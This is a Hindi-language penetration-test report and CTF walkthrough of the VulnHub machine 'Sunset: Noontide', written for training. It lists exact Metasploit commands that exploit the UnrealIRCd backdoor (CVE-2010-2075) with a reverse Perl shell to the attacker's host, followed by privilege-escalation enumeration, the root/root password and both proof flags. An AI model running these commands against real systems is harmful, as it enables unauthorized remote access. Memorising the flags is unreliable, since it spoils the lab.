
विवरण Sunset: Noontide VulnHub मशीन का पेशेवर पेनिट्रेशन टेस्टिंग मूल्यांकन, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, CVE-2010-2075 एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, और पूर्ण सिस्टम कॉम्प्रोमाइज़ शामिल हैं।
Sunset: Noontide का एक पेशेवर पेनेट्रेशन टेस्टिंग मूल्यांकन और CTF वॉकथ्रू, जो VulnHub की एक जानबूझकर कमजोर बनाई गई मशीन है।
यह प्रोजेक्ट पूर्ण पेनेट्रेशन टेस्टिंग जीवनचक्र का दस्तावेजीकरण करता है, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, वल्नरेबिलिटी रिसर्च, एक्सप्लॉइटेशन, प्रारंभिक एक्सेस, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, प्रूफ-ऑफ-कॉम्प्रोमाइज़, जोखिम मूल्यांकन, MITRE ATT&CK मैपिंग, और उपचार शामिल हैं।
⚠️ अस्वीकरण: यह मूल्यांकन एक अधिकृत प्रयोगशाला वातावरण में जानबूझकर कमजोर बनाई गई मशीन के विरुद्ध किया गया था। यहाँ प्रलेखित तकनीकें और कमांड केवल उन सिस्टम के लिए हैं जिनके लिए स्पष्ट प्राधिकरण प्राप्त किया गया है।
| घटक | विवरण |
|---|---|
| लक्ष्य | Sunset: Noontide |
| प्लेटफ़ॉर्म | VulnHub |
| लक्ष्य IP | 10.106.186.186 |
| लक्ष्य होस्टनाम | noontide |
| लक्ष्य OS | Debian GNU/Linux 10 (Buster) |
| आर्किटेक्चर | x86_64 |
| हमलावर प्लेटफ़ॉर्म | Kali Linux |
| हमलावर IP | 10.106.186.204 |
| मूल्यांकन प्रकार | अधिकृत प्रयोगशाला मूल्यांकन |
| समग्र जोखिम | CRITICAL |
| मूल्यांकन परिणाम | पूर्ण सिस्टम कॉम्प्रोमाइज़ |
लक्ष्य खोज → Nmap एन्यूमरेशन → UnrealIRCd 3.2.8.1 की पहचान → SearchSploit → CVE-2010-2075 की पहचान → Metasploit एक्सप्लॉइटेशन → रिमोट कमांड शेल → server के रूप में शेल → Linux पोस्ट-एक्सप्लॉइटेशन → कमजोर रूट क्रेडेंशियल → su root → UID 0 / रूट एक्सेस → उपयोगकर्ता और रूट प्रूफ फ़ाइलें
कमजोर लक्ष्य की पहचान करने के लिए प्रारंभिक नेटवर्क डिस्कवरी की गई।
लक्ष्य को अंततः इस रूप में पहचाना गया:
10.106.186.186
रेकॉनिसेंस के दौरान, 10.106.186.142 को इच्छित लक्ष्य के बजाय डिफ़ॉल्ट गेटवे के रूप में पहचाना गया।
यह आगे की सुरक्षा परीक्षण करने से पहले लक्ष्य की सही पहचान करने के महत्व को उजागर करता है, विशेष रूप से ब्रिज्ड या साझा प्रयोगशाला नेटवर्क में।
लक्ष्य के विरुद्ध Nmap सर्विस और संस्करण डिटेक्शन निम्नलिखित का उपयोग करके किया गया:
nmap -sV 10.106.186.186
मूल्यांकन के दौरान पहचानी गई महत्वपूर्ण उजागर सेवा थी:
6667/tcp open irc UnrealIRCd
इसके बाद अधिक विस्तृत स्कैन निम्नलिखित का उपयोग करके किया गया:
nmap -sC -sV -Pn -p 6667 10.106.186.186
सेवा की पहचान इस रूप में की गई:
UnrealIRCd 3.2.8.1
IRC सेवा ने यह भी रिपोर्ट किया:
irc.foonet.com
उजागर UnrealIRCd सेवा मूल्यांकन के दौरान जाँचा गया प्राथमिक अटैक सरफेस बन गई।
खोजे गए UnrealIRCd संस्करण से जुड़ी सार्वजनिक रूप से प्रलेखित कमजोरियों की जाँच के लिए SearchSploit का उपयोग किया गया।
कमांड:
searchsploit UnrealIRCd 3.2.8.1
प्रासंगिक परिणाम था:
UnrealIRCd 3.2.8.1 - Backdoor Command Exec
linux/remote/16922.rb
कमजोरी की पहचान इस रूप में की गई:
CVE-2010-2075
UnrealIRCd 3.2.8.1 बैकडोर कमांड एक्ज़ीक्यूशन
Critical
रिमोट कमांड एक्ज़ीक्यूशन
कमजोर सेवा का सफल शोषण हमलावर को लक्ष्य सिस्टम पर दूर से कमांड निष्पादित करने की अनुमति देता है।
कमजोर IRC सेवा का शोषण Metasploit Framework का उपयोग करके किया गया।
चयनित मॉड्यूल था:
exploit/unix/irc/unreal_ircd_3281_backdoor
उदाहरण कॉन्फ़िगरेशन:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 10.106.186.186
प्रारंभिक पेलोड प्रयासों से कोई उपयोगी सत्र उत्पन्न नहीं हुआ।
इसके बाद एक संगत Unix रिवर्स-Perl पेलोड चुना गया:
set payload cmd/unix/reverse_perl
set LHOST 10.106.186.204
set LPORT 4444
run
Metasploit ने रिपोर्ट किया कि लक्ष्य कमजोर प्रतीत होता है और सफलतापूर्वक एक कमांड-शेल सत्र खोला।
प्राप्त शेल को निम्नलिखित का उपयोग करके सत्यापित किया गया:
whoami
परिणाम:
server
इसने server खाते के रूप में सफल रिमोट कमांड निष्पादन की पुष्टि की।
प्रारंभिक कार्यशील निर्देशिका थी:
/home/server/irc/Unreal3.2
इस चरण में, मूल्यांकन रिमोट सेवा शोषण से स्थानीय पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन की ओर बढ़ा।
शेल प्राप्त करने के बाद, कॉम्प्रोमाइज़्ड होस्ट को समझने और संभावित प्रिविलेज एस्केलेशन पथों की पहचान करने के लिए मानक Linux एन्यूमरेशन किया गया।
कमांड:
id
परिणाम:
uid=1000(server) gid=1000(server)
खाता एक गैर-रूट उपयोगकर्ता था।
कमांड:
hostname
परिणाम:
noontide
कमांड:
uname -a
परिणाम:
Linux noontide 4.19.0-10-amd64 x86_64
कमांड:
cat /etc/os-release
परिणाम:
Debian GNU/Linux 10 (buster)
इन कमांडों ने वर्तमान पहचान, होस्टनाम, कर्नेल संस्करण, ऑपरेटिंग सिस्टम, और सामान्य सिस्टम कॉन्फ़िगरेशन को स्थापित किया।
कई मानक Linux प्रिविलेज एस्केलेशन जाँचें की गईं।
कमांड:
find / -perm -4000 -type f 2>/dev/null
passwd, chsh, mount, umount, su, chfn, newgrp, और gpasswd जैसे मानक SUID बाइनरी की पहचान की गई।
सफल एस्केलेशन वेक्टर के रूप में कोई स्पष्ट कस्टम या असामान्य SUID बाइनरी की पहचान नहीं की गई।
कमांड:
sudo -l
उपलब्ध आउटपुट से कोई उपयोगी sudo-आधारित प्रिविलेज एस्केलेशन पथ की पहचान नहीं की गई।
कमांड:
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
देखे गए शेड्यूल किए गए जॉब मानक Debian-शैली के सिस्टम जॉब थे।
कोई स्पष्ट रूप से लिखने योग्य रूट cron जॉब की पहचान नहीं की गई।
कमांड:
find / -writable -type f 2>/dev/null | head -100
प्रारंभिक परिणाम मुख्य रूप से /proc स्यूडो-फ़ाइलें थीं और किसी व्यावहारिक प्रिविलेज एस्केलेशन वेक्टर का खुलासा नहीं किया।
कमांड:
getcap -r / 2>/dev/null
परिणामी आउटपुट से कोई उपयोगी क्षमता-आधारित प्रिविलेज एस्केलेशन की पहचान नहीं की गई।
सफल प्रिविलेज एस्केलेशन पथ कमजोर मशीन पर कॉन्फ़िगर किए गए जानबूझकर कमजोर रूट क्रेडेंशियल पर आधारित था।
रूट खाते का उपयोग निम्नलिखित का उपयोग करके किया गया:
su root
पासवर्ड:
root
इसके बाद रूट एक्सेस को निम्नलिखित का उपयोग करके सत्यापित किया गया:
id
परिणाम:
uid=0(root) gid=0(root) groups=0(root)
पहचान की पुष्टि निम्नलिखित का उपयोग करके भी की गई:
whoami
परिणाम:
root
इसने लक्ष्य सिस्टम के पूर्ण प्रशासनिक नियंत्रण की पुष्टि की।
उपयोगकर्ता-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:
/home/server/local.txt
कमांड:
cat /home/server/local.txt
परिणाम:
c53c08b5bf2b0801c5d0c24149826a6e
रूट-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:
/root/proof.txt
कमांड:
cat /root/proof.txt
परिणाम:
ab28c8ca8da1b9ffc2d702ac54221105
रूट प्रूफ ने यह भी लौटाया:
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
दोनों प्रूफ फ़ाइलों की पुनर्प्राप्ति प्रारंभिक रिमोट एक्सेस से रूट-स्तरीय नियंत्रण तक सफल कॉम्प्रोमाइज़ की पुष्टि करती है।
| ID | निष्कर्ष | गंभीरता | प्रभाव |
|---|---|---|---|
| VULN-01 | UnrealIRCd 3.2.8.1 बैकडोर | 🔴 Critical | रिमोट कमांड एक्ज़ीक्यूशन |
| VULN-02 | कमजोर रूट क्रेडेंशियल | 🔴 Critical | पूर्ण प्रशासनिक कॉम्प्रोमाइज़ |
गंभीरता: Critical
प्रभावित सेवा: IRC / TCP 6667
प्रभावित सॉफ़्टवेयर: UnrealIRCd 3.2.8.1
CVE: CVE-2010-2075
हमले का प्रकार: रिमोट कमांड एक्ज़ीक्यूशन
देखा गया प्रभाव: server के रूप में रिमोट शेल प्राप्त
उजागर UnrealIRCd सेवा एक ज्ञात बैकडोर कमांड-एक्ज़ीक्यूशन कमजोरी से जुड़ा एक कमजोर संस्करण चला रही थी।
कमजोरी की पहचान सर्विस एन्यूमरेशन और SearchSploit रिसर्च के माध्यम से की गई और Metasploit का उपयोग करके सफलतापूर्वक शोषण किया गया।
कमजोर IRC सेवा तक पहुँचने में सक्षम हमलावर दूर से कमांड निष्पादित कर सकता है और होस्ट तक अनधिकृत पहुँच प्राप्त कर सकता है।
गंभीरता: Critical
प्रभावित खाता: root
देखा गया क्रेडेंशियल: root / root
देखा गया प्रभाव: UID 0 प्रशासनिक पहुँच
रूट खाता अत्यंत कमजोर क्रेडेंशियल के साथ कॉन्फ़िगर किया गया था।
server के रूप में स्थानीय शेल प्राप्त करने के बाद, कमजोर क्रेडेंशियल का उपयोग करके रूट खाते तक पहुँचा गया और UID 0 के साथ सत्यापित किया गया।
स्थानीय शेल एक्सेस प्राप्त करने वाला हमलावर ऑपरेटिंग सिस्टम का पूर्ण नियंत्रण प्राप्त करने के लिए कमजोर रूट क्रेडेंशियल का उपयोग कर सकता है।
कमजोर UnrealIRCd इंस्टॉलेशन को एक विश्वसनीय और समर्थित रिलीज़ से बदलें।
तैनाती से पहले सॉफ़्टवेयर की अखंडता और पैकेज की उत्पत्ति सत्यापित करें।
यदि सॉफ़्टवेयर की अखंडता या उत्पत्ति अनिश्चित है, तो विश्वसनीय इंस्टॉलेशन मीडिया और सत्यापित पैकेजों का उपयोग करके सिस्टम को पुनर्निर्मित करें।
डिफ़ॉल्ट और कमजोर क्रेडेंशियल को मजबूत, अद्वितीय प्रशासनिक क्रेडेंशियल से बदलें।
root जैसे सरल पासवर्ड का उपयोग न करें।
यदि IRC आवश्यक है, तो निम्नलिखित का उपयोग करके पहुँच प्रतिबंधित करें:
ऑपरेटिंग सिस्टम और सभी उजागर सेवाओं के लिए एक प्रलेखित पैच-प्रबंधन प्रक्रिया बनाए रखें।
लॉग और समीक्षा करें:
Sunset: Noontide होस्ट को प्रारंभिक नेटवर्क एक्सेस से पूर्ण रूट-स्तरीय नियंत्रण तक सफलतापूर्वक कॉम्प्रोमाइज़ किया गया।
प्राथमिक प्रारंभिक-एक्सेस कमजोरी UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) थी।
कमजोरी ने रिमोट कमांड एक्ज़ीक्यूशन प्रदान किया और परिणामस्वरूप server खाते के रूप में प्रारंभिक शेल प्राप्त हुआ।
इसके बाद पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन किया गया, जिसमें SUID, sudo, cron, राइटेबल-फ़ाइल, Linux क्षमता, पहचान, ऑपरेटिंग-सिस्टम, और फ़ाइलसिस्टम जाँचें शामिल थीं।
इन जाँचों ने सफल एस्केलेशन मार्ग की पहचान नहीं की।
पूर्ण प्रशासनिक पहुँच अंततः मशीन के कमजोर रूट क्रेडेंशियल के माध्यम से प्राप्त की गई।
उपयोगकर्ता-स्तरीय और रूट-स्तरीय दोनों प्रूफ फ़ाइलों की सफल पुनर्प्राप्ति ने पूर्ण सिस्टम कॉम्प्रोमाइज़ की पुष्टि की।
CRITICAL — पूर्ण सिस्टम कॉम्प्रोमाइज़ प्राप्त
इस प्रोजेक्ट के साथ एक विस्तृत पेशेवर पेनेट्रेशन टेस्टिंग रिपोर्ट शामिल है:
Sunset-Noontide-Penetration-Testing-Report.pdf
रिपोर्ट में शामिल हैं:
सुझावित रिपॉज़िटरी संरचना:
sunset-noontide-pentesting/
├── README.md
├── Sunset-Noontide-Penetration-Testing-Report.pdf
└── evidence/
├── 01-target-discovery.png
├── 02-nmap-enumeration.png
├── 03-searchsploit.png
├── 04-metasploit-exploitation.png
├── 05-initial-shell.png
├── 06-post-exploitation.png
├── 07-privilege-escalation.png
└── 08-root-proof.png
स्क्रीनशॉट में केवल अधिकृत प्रयोगशाला वातावरण की जानकारी होनी चाहिए।
इस मूल्यांकन ने निम्नलिखित में व्यावहारिक अनुभव प्रदान किया:
यह रिपॉज़िटरी सख्ती से निम्नलिखित के लिए है:
| तकनीक | ID | देखी गई गतिविधि |
|---|
| नेटवर्क सर्विस स्कैनिंग | T1046 | Nmap एन्यूमरेशन |
| एक्सपोज़्ड पब्लिक-फेसिंग एप्लिकेशन का शोषण | T1190 | उजागर UnrealIRCd सेवा का शोषण |
| कमांड और स्क्रिप्टिंग इंटरप्रेटर | T1059 | रिमोट कमांड शेल |
| वैध खाते | T1078 | रूट क्रेडेंशियल का उपयोग |
| खाता खोज | T1087 | पहचान और उपयोगकर्ता एन्यूमरेशन |
| सिस्टम सूचना खोज | T1082 | uname और /etc/os-release |
| फ़ाइल और निर्देशिका खोज | T1083 | फ़ाइलसिस्टम एन्यूमरेशन |
| शेड्यूल्ड टास्क/जॉब खोज | T1053 | Cron एन्यूमरेशन |
| अनुमति समूह खोज | T1069 | id और समूह एन्यूमरेशन |
| चरण | गतिविधियाँ |
|---|
| रेकॉनिसेंस | नेटवर्क डिस्कवरी और लक्ष्य पहचान |
| एन्यूमरेशन | Nmap सर्विस/संस्करण डिटेक्शन |
| वल्नरेबिलिटी रिसर्च | SearchSploit और Metasploit मॉड्यूल पहचान |
| एक्सप्लॉइटेशन | UnrealIRCd बैकडोर का शोषण |
| प्रारंभिक एक्सेस | server के रूप में कमांड शेल |
| पोस्ट-एक्सप्लॉइटेशन | पहचान, OS, फ़ाइलसिस्टम और विशेषाधिकार एन्यूमरेशन |
| प्रिविलेज एस्केलेशन | SUID, sudo, cron, राइटेबल-फ़ाइल और क्षमता जाँच |
| साक्ष्य संग्रह | उपयोगकर्ता और रूट प्रूफ फ़ाइलें |
| रिपोर्टिंग | निष्कर्ष, जोखिम विश्लेषण और उपचार |
| उद्देश्य | स्थिति |
|---|
| लक्ष्य की पहचान | ✅ PASS |
| उजागर सेवा की पहचान | ✅ PASS |
| कमजोर संस्करण की पहचान | ✅ PASS |
| CVE की पहचान | ✅ PASS |
| रिमोट कमांड एक्ज़ीक्यूशन | ✅ PASS |
server के रूप में प्रारंभिक शेल | ✅ PASS |
| उपयोगकर्ता प्रूफ पुनर्प्राप्त | ✅ PASS |
| प्रिविलेज एस्केलेशन | ✅ PASS |
| रूट एक्सेस सत्यापित | ✅ PASS |
| रूट प्रूफ पुनर्प्राप्त | ✅ PASS |